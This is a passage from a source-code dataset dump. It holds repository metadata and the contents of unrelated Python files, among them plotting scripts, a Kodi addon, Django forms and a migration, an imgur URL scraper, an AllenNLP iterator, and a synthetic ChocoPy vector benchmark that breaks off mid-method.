# df_tmva_noiso["hzz_iso"].hist(bins=200)
# plt.show()
# regr = linear_model.LogisticRegression()
# regr.fit(df_tmva_noiso[["hzz_iso", "BDT"]], df_tmva_noiso["classID"])
# print('Coefficients: \n', regr.coef_)
# df_tmva_noiso["hzz_seq"] = regr.predict_proba(df_tmva_noiso[["hzz_iso", "BDT"]])[:,1]
# print(df_tmva_noiso)
plt.figure()
roc = ROCPlot(xlim=(0.6,1), ylim=(0.0011, 1), logscale=True, grid=True, percent=True, height_ratios=[1,1], ncol=2, rlim=(0.75, 1.15))
# roc.plot(df_tmva_noiso["classID"] == 1, df_tmva_noiso["hzz_seq"], label="TMVA + iso seq.", color='k')
roc.plot(df_tmva["classID"] == 0, df_tmva["BDT"], label="TMVA")
roc.plot(df_v2["y"] == 1, df_v2["Fall17NoIsoV2Vals"], label="Fall17V2")
roc.plot(df["y"] == 1, df["bdt_score_default"], label="xgb default")
roc.plot(df["y"] == 1, df["bdt_score_bo"], label="xgb bayes_opt")
# plt.show()
plt.savefig("plots/bayes_opt/roc_noiso_{}.pdf".format(location))
plt.savefig("plots/bayes_opt/roc_noiso_{}.png".format(location), dpi=300)
|
[
"mkovac@cern.ch"
] |
mkovac@cern.ch
|
3021bb1ad7c1d4f5bdbd65651af529d05dd7191a
|
9ed7b2cf5721a7473be269433374498ea5c2e4fe
|
/addon.py
|
f86f71c9ae1526ea7c5fa32c158e976701609db7
|
[] |
no_license
|
queeup/service.quartz.tvshelf
|
8358631647de065159ccf36afb374c8e149bc6fd
|
16d496c2b2e496b64a54ad3f64d489589edb27d3
|
refs/heads/master
| 2021-03-19T07:07:46.878378
| 2015-03-13T16:20:40
| 2015-03-13T16:20:40
| 31,160,364
| 0
| 1
| null | 2015-02-23T13:55:54
| 2015-02-22T11:02:10
|
Python
|
UTF-8
|
Python
| false
| false
| 2,084
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# This script is based on service.library.data.provider
# Thanks to the original authors
import sys
import xbmc
import xbmcgui
import xbmcplugin
import xbmcaddon
if sys.version_info < (2, 7):
import simplejson as json
else:
import json
addon = xbmcaddon.Addon()
addon_version = addon.getAddonInfo('version')
addon_id = addon.getAddonInfo('id')
addon_name = addon.getAddonInfo('name')
import library
LIBRARY = library.LibraryFunctions()
def log(txt):
message = '%s: %s' % (addon_name, txt.encode('ascii', 'ignore'))
xbmc.log(msg=message, level=xbmc.LOGDEBUG)
class Main:
def __init__(self):
self._init_vars()
full_liz = list()
xbmcplugin.setContent(int(sys.argv[1]), 'episodes')
self.parse_tvshows(full_liz)
xbmcplugin.addDirectoryItems(int(sys.argv[1]), full_liz)
xbmcplugin.endOfDirectory(handle=int(sys.argv[1]))
def _init_vars(self):
self.USECACHE = True
def parse_tvshows(self, full_liz):
json_query = self._get_data()
while json_query == "LOADING":
xbmc.sleep(100)
json_query = self._get_data()
if json_query:
json_query = json.loads(json_query)
if 'result'in json_query and 'episodes' in json_query['result']:
for item in json_query['result']['episodes']:
liz = xbmcgui.ListItem(item['title'])
liz.setInfo(type="Video", infoLabels={"Title": item['title'],
"Episode": item['episode'],
"Season": item['season'],
})
liz.setProperty("resumetime", str(item['resume']['position']))
liz.setArt(item['art'])
liz.setProperty("fanart_image", item['art'].get('tvshow.fanart', ''))
full_liz.append((item['file'], liz, False))
del json_query
def _get_data(self):
return LIBRARY._fetch_recent_episodes(self.USECACHE)
log('script version %s started' % addon_version)
Main()
log('script version %s stopped' % addon_version)
|
[
"ozgur.baskin@gmail.com"
] |
ozgur.baskin@gmail.com
|
3f153e9ae77aa6a7fc3afd1c82d1936168288a8b
|
5ce6e269e9d879fe2f938adb0e375d6367894409
|
/barinput.py
|
66bf2414991fddc040a39f4c58ae55ce063a9193
|
[] |
no_license
|
Kondapsa/Data_Analytics_with_Software
|
c42cb1dd8631361989e3fff5feedb24efe2364c7
|
92a0627014c32646b8be9d0280c96929762d92f6
|
refs/heads/master
| 2021-05-16T20:03:44.932780
| 2020-03-27T05:36:52
| 2020-03-27T05:36:52
| 250,449,916
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 404
|
py
|
"""Interactively chart two columns of an Excel workbook as a bar graph."""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt

plt.style.use('ggplot')

# Ask the user which workbook and which two columns to chart.
fil = input("Enter your Excel filename: ")
df = pd.read_excel(fil)
var1 = input("Enter First variable:")
var2 = input("Enter Second variable:")

# First chosen column on the x-axis, second on the y-axis.
plt.bar(df[var1], df[var2], label='cars', color='c')
plt.xlabel(var1)
plt.ylabel(var2)
plt.title("Bar Graph of cars")
plt.legend()
plt.show()
|
[
"kondapsa@mail.uc.edu"
] |
kondapsa@mail.uc.edu
|
2dbee62c248a9b7e056ac445adf1326652856989
|
38c23b1351e0d13fbfa5eb8742944005b3bb0369
|
/cmh/_version.py
|
4211bfaf77e78dd457ae8b486c79152ac1711a39
|
[
"MIT"
] |
permissive
|
mellesies/cmh
|
cc9075777cab94e406ae0ec3f9b5088b8f5ac1f7
|
efc7f494fd07d92b7e165046fc638323c10673dc
|
refs/heads/master
| 2023-05-04T01:37:56.791130
| 2021-05-27T17:27:26
| 2021-05-27T17:27:26
| 371,015,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 566
|
py
|
"""Derive the module version string from a static tuple plus the build
number stored in the adjacent ``__build__`` JSON file."""
import os
import json

# The build stamp ships as a JSON document next to this module.
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, '__build__')) as fp:
    __build__ = json.load(fp)

# (major, minor, micro, release-stage, build)
version_info = (1, 0, 0, 'final', __build__)

# PEP 440-style suffix for each release stage; final releases carry none.
_specifier_ = {'alpha': 'a', 'beta': 'b', 'candidate': 'rc', 'final': ''}

# e.g. "1.0.0" for a final release, "1.0.0rc<build>" for a candidate.
if version_info[3] == 'final':
    _suffix = ''
else:
    _suffix = _specifier_[version_info[3]] + str(version_info[4])
__version__ = '%s.%s.%s%s' % (version_info[0], version_info[1],
                              version_info[2], _suffix)
|
[
"melle.sieswerda@gmail.com"
] |
melle.sieswerda@gmail.com
|
605f7763fe3be2fd9b4ed26ca2583f357599675b
|
f79cd0264ebb906724a1d5bbb8092b392450cee6
|
/publications/migrations/0003_auto_20170507_2028.py
|
2826f52a6ff4128ce1069e6e98151bac8e6f1010
|
[] |
no_license
|
ngabovictor/darsee
|
2a4ade9f15702a3290ce8b9713efc20a3656ffb4
|
9ed00ebf070566353863ed23751c30462858b2af
|
refs/heads/master
| 2021-01-20T14:09:24.018563
| 2017-05-12T23:15:54
| 2017-05-12T23:15:54
| 90,569,504
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-05-07 20:28
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: alters the ``date`` default and the
    ``image`` field on the ``posts`` model."""

    dependencies = [
        ('publications', '0002_auto_20170507_1842'),
    ]
    operations = [
        migrations.AlterField(
            model_name='posts',
            name='date',
            # NOTE(review): the default is the frozen makemigrations
            # timestamp, not a callable like timezone.now — new rows will
            # all default to 2017-05-07. Confirm this is intended.
            field=models.DateField(default=datetime.datetime(2017, 5, 7, 20, 28, 35, 915847)),
        ),
        migrations.AlterField(
            model_name='posts',
            name='image',
            # The default string doubles as an instruction to the uploader.
            field=models.FileField(default='Please, use images of the same sizes (dimensions)', upload_to='publications_media'),
        ),
    ]
|
[
"nvichack@gmail.com"
] |
nvichack@gmail.com
|
28512c780e8d10cbf5defc8de21ce5dde0c24e1c
|
250f693fb04f6717c2489698d04172bbc64294d7
|
/src/imgur_url.py
|
89bdb2b204ba01ed7a2f9af1cd3885979a1195d5
|
[] |
no_license
|
plasmaofthedawn/amadeus
|
0194c3cf29f1ad9a9a8d1e0a1eba74b4a78d7d81
|
72f511194864b4a72a6cc290afe19b903fbf3f2a
|
refs/heads/master
| 2022-06-29T05:41:57.714880
| 2019-12-04T07:35:06
| 2019-12-04T07:35:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,522
|
py
|
import re
import requests
def get_imgur_urls(starturl):
    '''
    Dispatch an imgur link to the handler matching its kind
    (album, gallery, or single image) and return that handler's result.

    Raises ValueError if the link is not a recognised imgur URL.
    '''
    # Strip spaces once up front instead of re-doing it for every regex
    # test and every handler call below (the original repeated the work).
    url = starturl.replace(' ', '')
    albumRegEx = r"imgur.com\/a\/([\w\d]*)"
    galleryRegEx = r"imgur.com\/gallery\/([\w\d]*)"
    singleImageRegEx = r"imgur.com\/([\w\d]{7})"
    # Order matters: the single-image pattern would also match album and
    # gallery URLs, so test the more specific forms first.
    if re.search(albumRegEx, url):
        return get_album_urls(url)
    elif re.search(galleryRegEx, url):
        return get_gallery_urls(url)
    elif re.search(singleImageRegEx, url):
        return get_single_image_url(url)
    else:
        raise ValueError('Not an valid imgur link!')
def get_album_urls(starturl):
    """Album scraping is not implemented; echo the URL with a -1 count."""
    return (starturl, -1)
def get_gallery_urls(starturl):
    """Gallery scraping is not implemented; warn and return an empty result."""
    print("yo gallerys don't work")
    return ("", -1)
def get_single_image_url(starturl):
    '''
    Download the imgur page at *starturl* and return a tuple of
    ([direct i.imgur.com image URL], 1).

    Raises Exception if the page cannot be fetched.
    '''
    finishedurl = []
    # Matches the hash and extension of the direct image link in the page.
    regex = r"href\=\"https://i\.imgur\.com\/([\d\w]*)(\.jpg|\.png|\.gif|\.mp4|\.gifv)"
    try:
        imgurHTML = requests.get(starturl)
    except requests.RequestException as err:
        # The original bare `except:` also swallowed KeyboardInterrupt and
        # SystemExit; only network/HTTP failures are expected here.
        raise Exception('Something failed with the download') from err
    imgurhash = re.findall(regex, imgurHTML.text)
    # First match is the direct link: hash + extension.
    finishedurl.append('https://i.imgur.com/{0}{1}'.format(imgurhash[0][0], imgurhash[0][1]))
    return finishedurl, 1
'''
Test URLS:
Album: https://imgur.com/a/3aeC1
SingleImage: https://imgur.com/URyijAU
Gallery: https://imgur.com/gallery/sQJ2h
'''
|
[
"noreply@github.com"
] |
plasmaofthedawn.noreply@github.com
|
37e16f43724c177d1cceecf893194be5b33b4591
|
c7c2fc056025d88a39eb975fb658b41d77dd7d73
|
/dnms/plotmds.py
|
e2ad52c5cd9b817bfa06d5ae6149881e1b781c87
|
[] |
no_license
|
ThomasMiconi/BiologicallyPlausibleLearningRNN
|
f03f602fd657c7d627b2a0e5a41e6b701cdad1a4
|
d8b0835dbcacfd73ee8d41d8054cc7592f4153b2
|
refs/heads/master
| 2021-01-17T15:49:28.598625
| 2019-04-23T21:50:07
| 2019-04-23T21:50:07
| 56,398,297
| 35
| 17
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,520
|
py
|
from pylab import *
import numpy as np
import scipy as sp
import glob
from sklearn import manifold
#from sklearn.metrics import euclidean_distances
# Python 2 analysis script: load saved network responses for the four trial
# types, then visualise the population state at selected timesteps with a
# 2-D MDS embedding and save the figure.
if 1:
    datalist=[]
    labellist=[]
    for trialtype in range(4):
        print trialtype
        #trying 300 ms , total time 1100
        #0 : too messy
        # 1 : also too messy
        # Also too messy.
        # Back to 1000 ms, eval time 200, but longer training?
        # 0 still seems least bad
        # One response matrix per file matching this trial type / seed pattern.
        fnames = glob.glob('rs_long_type'+str(trialtype)+'*ETA0.1*SEED0.txt')
        for nm in fnames:
            r = loadtxt(nm)
            #z = r.reshape((110,10,200))
            #z = sum(z,axis=1)
            z = r #r[0::10,:]
            datalist.append(z)
            #labellist.append([trialtype]*r.shape[0])
            labellist.append(trialtype)
# Stack the loaded matrices along a third axis, then keep every other slice.
matdata = dstack(datalist) ; #+ .5 * standard_normal(matdata.shape)
matdata = matdata[:,:,::2]
NBPTS = matdata.shape[2]
# Zero-amplitude noise term: currently a no-op, kept for easy perturbation.
matdata += .0 * standard_normal(shape(matdata))
ion()
fgr, sps = subplots(3, 3)
# 8.5cm = 3.3 inches for single column. 6.9 inches for two-column
#fgr.set_size_inches(3.3, 6)
#fgr.set_facecolor('white')
#slicetimes= [850, 900, 990, 999] #[200, 600, 900 , 850, 990, 999]
slicetimes= [199, 599, 799, 999] #[200, 600, 900 , 850, 990, 999]
subplots_adjust(wspace=0, hspace=.25)
# One MDS scatter per selected timestep; the slices along the third axis are
# plotted in four equal quarters, coloured to match the AA/AB/BA/BB legend.
for numgraph in range(4):
    tslc = matdata[slicetimes[numgraph],:,:].T
    mds = manifold.MDS(n_components=2, max_iter=1000, dissimilarity="euclidean")
    pos = mds.fit(tslc).embedding_
    ax = sps[numgraph/2,numgraph%2]
    ax.set_title(str(1+slicetimes[numgraph])+'ms', size=10)
    ax.plot(pos[0:NBPTS/4-1, 0], pos[0:NBPTS/4-1, 1], 'oc', markersize=8)
    ax.plot(pos[NBPTS/4:2*NBPTS/4-1, 0], pos[NBPTS/4:2*NBPTS/4-1, 1], 'or', markersize=8)
    ax.plot(pos[2*NBPTS/4:3*NBPTS/4-1, 0], pos[2*NBPTS/4:3*NBPTS/4-1, 1], 'og', markersize=8)
    ax.plot(pos[3*NBPTS/4:NBPTS-1, 0], pos[3*NBPTS/4:NBPTS-1, 1], 'oy', markersize=8)
    if numgraph==0 or numgraph==2:
        ax.set_ylabel('Dimension 2', size=10)
    if numgraph==2 or numgraph==3:
        ax.set_xlabel('Dimension 1', size=10)
    ax.set_xticklabels([])
    ax.set_yticklabels([])
    ax.set_xlim(-10,10)
    ax.set_ylim(-10,10)
    ax.set_aspect('equal', 'box')
# Hide the unused cells of the 3x3 grid.
sps[2,0].axis('off')
sps[2,1].axis('off')
sps[0,2].axis('off')
sps[1,2].axis('off')
sps[2,2].axis('off')
sps[0,1].legend(['AA','AB', 'BA', 'BB'], numpoints = 1, ncol= 1, loc=3, prop={'size':10}, bbox_to_anchor=(1.1,-.5))
savefig('figure_mds.png', bbox_inches='tight', dpi=300)
draw()
|
[
"thomas.miconi@gmail.com"
] |
thomas.miconi@gmail.com
|
a48da3eaff7e1dff747a208dd161e8ffcf6e796f
|
9c6cf3f14042d8b9c6b6153b74451b76cd352531
|
/curation/forms.py
|
a30163227736eab73f0675be5ffe881149f30aab
|
[] |
no_license
|
manshon/djangoApp
|
8c48ad0d9fece2d5458e1c75208366342eff5200
|
e13e4c3b908eb68abaeea41a136d2fa50a75b133
|
refs/heads/master
| 2020-03-11T23:57:25.384100
| 2018-05-16T07:33:51
| 2018-05-16T07:33:51
| 130,336,641
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,108
|
py
|
from django import forms
from .models import Comment, Community, Article
class ArticleCommentForm(forms.ModelForm):
    """Comment-posting form: exposes only the comment body."""
    class Meta:
        model = Comment
        fields = (
            'body',
        )
class ArticleCreateForm(forms.ModelForm):
    """Form for creating an Article: title, body, thumbnail, visibility."""
    class Meta:
        model = Article
        fields = (
            'title',
            'body',
            'thumbnail',
            'is_public',
        )
class ArticleEditForm(forms.ModelForm):
    """Form for editing an Article; exposes the same fields as creation."""
    class Meta:
        model = Article
        fields = (
            'title',
            'body',
            'thumbnail',
            'is_public',
        )
class ArticleSearchForm(forms.ModelForm):
    """Search form: one free-text field; no model fields are exposed."""
    # Label is Japanese for "search word".
    search_word = forms.CharField(label='検索ワード')
    class Meta:
        model = Article
        fields = ()
class CommunityCreateForm(forms.ModelForm):
    """Form for creating a Community: name and description."""
    class Meta:
        model = Community
        fields = (
            'name',
            'description',
        )
class CommunityEditForm(forms.ModelForm):
    """Form for editing a Community; same fields as creation."""
    class Meta:
        model = Community
        fields = (
            'name',
            'description',
        )
|
[
"mansho538552@gmail.com"
] |
mansho538552@gmail.com
|
43ae6d6bf326964c6a7d764f1a189bfbed192d6a
|
1ce4c0961f63e037e2a7da46f3e81d804b6e19b0
|
/5_dict.py
|
ce48919d27435387fbd499b5fdeae50b99cb656d
|
[] |
no_license
|
alexmudra/python_experiments
|
256b6a5996f603034cf81ac2dd1565976efe07ad
|
31c91905611dee9cc13dbf37e7c0cfbf9ca0173f
|
refs/heads/master
| 2023-04-06T07:50:00.407452
| 2023-04-02T17:38:49
| 2023-04-02T17:38:49
| 154,693,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 605
|
py
|
# Inventory of phones. NOTE(review): the data uses the misspelled key
# 'display_heith'; kept as-is so the lookups below stay consistent.
phones = [
    {'brand': 'samsung', 'model': 'a7', 'display_width': 1980, 'display_heith': 1080, 'is_gprs': 'Yes', 'is_wi-fi': 'Yes'},
    {'brand': 'iphone', 'model': 7, 'display_width': 2200, 'display_heith': 1080, 'is_gprs': 'Yes', 'is_wi-fi': 'Yes'},
    {'brand': 'xiaomy', 'model': 8, 'display_width': 2200, 'display_heith': 1080, 'is_gprs': 'Yes', 'is_wi-fi': 'Yes'},
    {'brand': 'nokia', 'model': 6.01, 'display_width': 1800, 'display_heith': 900, 'is_gprs': 'Yes', 'is_wi-fi': 'Yes'}
]
# Print a line for every phone wider than 1900 and at least 1000 px tall.
# Bug fix: the original used bitwise '&', which binds tighter than the
# comparisons and evaluated `width > (1900 & height) >= 1000` instead of
# the intended conjunction; 'and' is the correct logical operator.
for phone in phones:
    if phone['display_width'] > 1900 and phone["display_heith"] >= 1000:
        print("dslfklsdkf")
|
[
"alexander.kobko@gmail.com"
] |
alexander.kobko@gmail.com
|
0953b5059310c24ba91ffec1812f216ca631cb80
|
ebec36b608bd0dc1040fb1a3dc172de43568f85a
|
/bella_allen_nlp/iterators/augmented_iterator.py
|
27ce07315612057f6bc64b4d6f93bc08e0e6bdd0
|
[] |
no_license
|
apmoore1/Bella-AllenNLP
|
2b887f2b268886186511292cdba27dd50e1bd686
|
55f5474629de948ccd5592d997aa7343b06db8e3
|
refs/heads/master
| 2020-03-30T18:14:05.703041
| 2019-07-22T08:25:59
| 2019-07-22T08:25:59
| 151,490,106
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,624
|
py
|
from collections import deque
from typing import Iterable, Deque
import logging
import random
from allennlp.common.util import lazy_groups_of
from allennlp.data.instance import Instance
from allennlp.data.iterators.data_iterator import DataIterator
from allennlp.data.dataset import Batch
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
@DataIterator.register("augmented")
class AugmentedIterator(DataIterator):
    """
    Iterator that selects which instances to batch based on the current
    epoch number. Each instance may carry an ``epoch_numbers`` array field
    listing the epochs in which it should appear; ``-1`` acts as a wildcard
    (included every epoch), and instances without the field are always
    included. Selected instances are then grouped into fixed-size batches.
    Takes the same parameters as :class:`allennlp.data.iterators.DataIterator`.

    ``get_num_batches`` is overridden because only a per-epoch sub-sample of
    the dataset is used, so the full-dataset count would be wrong.
    """
    def _create_batches(self, instances: Iterable[Instance], shuffle: bool) -> Iterable[Batch]:
        # First break the dataset into memory-sized lists:
        # _epochs is keyed by dataset identity and tracks the current epoch.
        epoch_number = self._epochs[id(instances)]
        filtered_instances = []
        for instance in instances:
            if 'epoch_numbers' in instance.fields:
                epoch_numbers = instance.fields['epoch_numbers'].array
                # Keep instances tagged for this epoch, or tagged -1
                # (wildcard: selected in every epoch); drop the rest.
                if epoch_number in epoch_numbers:
                    filtered_instances.append(instance)
                    continue
                elif -1 in epoch_numbers:
                    filtered_instances.append(instance)
                    continue
                else:
                    continue
            # Instances without an 'epoch_numbers' field are always kept.
            filtered_instances.append(instance)
        for instance_list in self._memory_sized_lists(filtered_instances):
            if shuffle:
                random.shuffle(instance_list)
            iterator = iter(instance_list)
            excess: Deque[Instance] = deque()
            # Then break each memory-sized list into batches.
            for batch_instances in lazy_groups_of(iterator, self._batch_size):
                for possibly_smaller_batches in self._ensure_batch_is_sufficiently_small(batch_instances, excess):
                    batch = Batch(possibly_smaller_batches)
                    yield batch
            # Leftover instances that didn't fill a batch still get yielded.
            if excess:
                yield Batch(excess)
    def get_num_batches(self, instances: Iterable[Instance]) -> int:
        """
        The way this needs to be changed is that we could iterate through the
        instances and count the number in the current epoch? Don't know
        how slow this would be through?
        Returns the number of batches that ``dataset`` will be split into; if you want to track
        progress through the batch with the generator produced by ``__call__``, this could be
        useful.

        NOTE(review): currently a placeholder — always reports 1 batch, so
        progress tracking over this iterator is inaccurate.
        """
        return 1
        # epoch_number = self._epochs[id(instances)]
        # if is_lazy(instances) and self._instances_per_epoch is None:
        #    # Unable to compute num batches, so just return 1.
        #    return 1
        # elif self._instances_per_epoch is not None:
        #    return math.ceil(self._instances_per_epoch / self._batch_size)
        # else:
        #    # Not lazy, so can compute the list length.
        #    return math.ceil(len(ensure_list(instances)) / self._batch_size)
|
[
"andrew.p.moore94@gmail.com"
] |
andrew.p.moore94@gmail.com
|
61cd43ec55031aa1e4ae0113843c9c55444e359b
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/sieve-big-9886.py
|
03cdd03c620df30c28f585f25b600d57880919f5
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 31,758
|
py
|
# A growable array of integers backed by a plain list
class Vector(object):
    items: [int] = None
    size: int = 0

    def __init__(self:"Vector"):
        self.items = [0]

    # Number of backing slots currently allocated
    def capacity(self:"Vector") -> int:
        return len(self.items)

    # Grow the backing storage by a single slot
    def increase_capacity(self:"Vector") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Store item after the last occupied slot, growing if full
    def append(self:"Vector", item: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Append every element of new_items in order
    def append_all(self:"Vector", new_items: [int]) -> object:
        x:int = 0
        for x in new_items:
            self.append(x)

    # Delete the element at idx, shifting later elements left
    def remove_at(self:"Vector", idx: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Element stored at position idx
    def get(self:"Vector", idx: int) -> int:
        return self.items[idx]

    # Count of elements currently stored
    def length(self:"Vector") -> int:
        return self.size
# A growable array of integers (benchmark variant with duplicated members)
class Vector2(object):
    items: [int] = None
    items2: [int] = None
    size: int = 0
    size2: int = 0

    def __init__(self:"Vector2"):
        self.items = [0]

    # Number of backing slots currently allocated
    def capacity(self:"Vector2") -> int:
        return len(self.items)

    # Number of backing slots currently allocated
    def capacity2(self:"Vector2") -> int:
        return len(self.items)

    # Grow the backing storage by a single slot
    def increase_capacity(self:"Vector2") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Grow the backing storage by a single slot
    def increase_capacity2(self:"Vector2") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Store item after the last occupied slot, growing if full
    def append(self:"Vector2", item: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Store item after the last occupied slot (extra argument unused)
    def append2(self:"Vector2", item: int, item2: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Append every element of new_items in order
    def append_all(self:"Vector2", new_items: [int]) -> object:
        x:int = 0
        for x in new_items:
            self.append(x)

    # Append every element of new_items in order (extra argument unused)
    def append_all2(self:"Vector2", new_items: [int], new_items2: [int]) -> object:
        x:int = 0
        x2:int = 0
        for x in new_items:
            self.append(x)

    # Delete the element at idx, shifting later elements left
    def remove_at(self:"Vector2", idx: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Delete the element at idx (extra argument unused)
    def remove_at2(self:"Vector2", idx: int, idx2: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Element stored at position idx
    def get(self:"Vector2", idx: int) -> int:
        return self.items[idx]

    # Element stored at position idx (extra argument unused)
    def get2(self:"Vector2", idx: int, idx2: int) -> int:
        return self.items[idx]

    # Count of elements currently stored
    def length(self:"Vector2") -> int:
        return self.size

    # Count of elements currently stored
    def length2(self:"Vector2") -> int:
        return self.size
# A growable array of integers (benchmark variant with duplicated members)
class Vector3(object):
    items: [int] = None
    items2: [int] = None
    items3: [int] = None
    size: int = 0
    size2: int = 0
    size3: int = 0

    def __init__(self:"Vector3"):
        self.items = [0]

    # Number of backing slots currently allocated
    def capacity(self:"Vector3") -> int:
        return len(self.items)

    # Number of backing slots currently allocated
    def capacity2(self:"Vector3") -> int:
        return len(self.items)

    # Number of backing slots currently allocated
    def capacity3(self:"Vector3") -> int:
        return len(self.items)

    # Grow the backing storage by a single slot
    def increase_capacity(self:"Vector3") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Grow the backing storage by a single slot
    def increase_capacity2(self:"Vector3") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Grow the backing storage by a single slot
    def increase_capacity3(self:"Vector3") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Store item after the last occupied slot, growing if full
    def append(self:"Vector3", item: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Store item after the last occupied slot (extra arguments unused)
    def append2(self:"Vector3", item: int, item2: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Store item after the last occupied slot (extra arguments unused)
    def append3(self:"Vector3", item: int, item2: int, item3: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Append every element of new_items in order
    def append_all(self:"Vector3", new_items: [int]) -> object:
        x:int = 0
        for x in new_items:
            self.append(x)

    # Append every element of new_items in order (extra arguments unused)
    def append_all2(self:"Vector3", new_items: [int], new_items2: [int]) -> object:
        x:int = 0
        x2:int = 0
        for x in new_items:
            self.append(x)

    # Append every element of new_items in order (extra arguments unused)
    def append_all3(self:"Vector3", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
        x:int = 0
        x2:int = 0
        x3:int = 0
        for x in new_items:
            self.append(x)

    # Delete the element at idx, shifting later elements left
    def remove_at(self:"Vector3", idx: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Delete the element at idx (extra arguments unused)
    def remove_at2(self:"Vector3", idx: int, idx2: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Delete the element at idx (extra arguments unused)
    def remove_at3(self:"Vector3", idx: int, idx2: int, idx3: int) -> object:
        cur:int = 0
        if idx < 0:
            return
        cur = idx
        while cur < self.size - 1:
            self.items[cur] = self.items[cur + 1]
            cur = cur + 1
        self.size = self.size - 1

    # Element stored at position idx
    def get(self:"Vector3", idx: int) -> int:
        return self.items[idx]

    # Element stored at position idx (extra arguments unused)
    def get2(self:"Vector3", idx: int, idx2: int) -> int:
        return self.items[idx]

    # Element stored at position idx (extra arguments unused)
    def get3(self:"Vector3", idx: int, idx2: int, idx3: int) -> int:
        return self.items[idx]

    # Count of elements currently stored
    def length(self:"Vector3") -> int:
        return self.size

    # Count of elements currently stored
    def length2(self:"Vector3") -> int:
        return self.size

    # Count of elements currently stored
    def length3(self:"Vector3") -> int:
        return self.size
# A growable array of integers (benchmark variant with duplicated members)
class Vector4(object):
    items: [int] = None
    items2: [int] = None
    items3: [int] = None
    items4: [int] = None
    size: int = 0
    size2: int = 0
    size3: int = 0
    size4: int = 0

    def __init__(self:"Vector4"):
        self.items = [0]

    # Number of backing slots currently allocated
    def capacity(self:"Vector4") -> int:
        return len(self.items)

    # Number of backing slots currently allocated
    def capacity2(self:"Vector4") -> int:
        return len(self.items)

    # Number of backing slots currently allocated
    def capacity3(self:"Vector4") -> int:
        return len(self.items)

    # Number of backing slots currently allocated
    def capacity4(self:"Vector4") -> int:
        return len(self.items)

    # Grow the backing storage by a single slot
    def increase_capacity(self:"Vector4") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Grow the backing storage by a single slot
    def increase_capacity2(self:"Vector4") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Grow the backing storage by a single slot
    def increase_capacity3(self:"Vector4") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Grow the backing storage by a single slot
    def increase_capacity4(self:"Vector4") -> int:
        self.items = self.items + [0]
        return self.capacity()

    # Store item after the last occupied slot, growing if full
    def append(self:"Vector4", item: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Store item after the last occupied slot (extra arguments unused)
    def append2(self:"Vector4", item: int, item2: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Store item after the last occupied slot (extra arguments unused)
    def append3(self:"Vector4", item: int, item2: int, item3: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Store item after the last occupied slot (extra arguments unused)
    def append4(self:"Vector4", item: int, item2: int, item3: int, item4: int) -> object:
        if self.capacity() == self.size:
            self.increase_capacity()
        self.items[self.size] = item
        self.size = self.size + 1

    # Append every element of new_items in order
    def append_all(self:"Vector4", new_items: [int]) -> object:
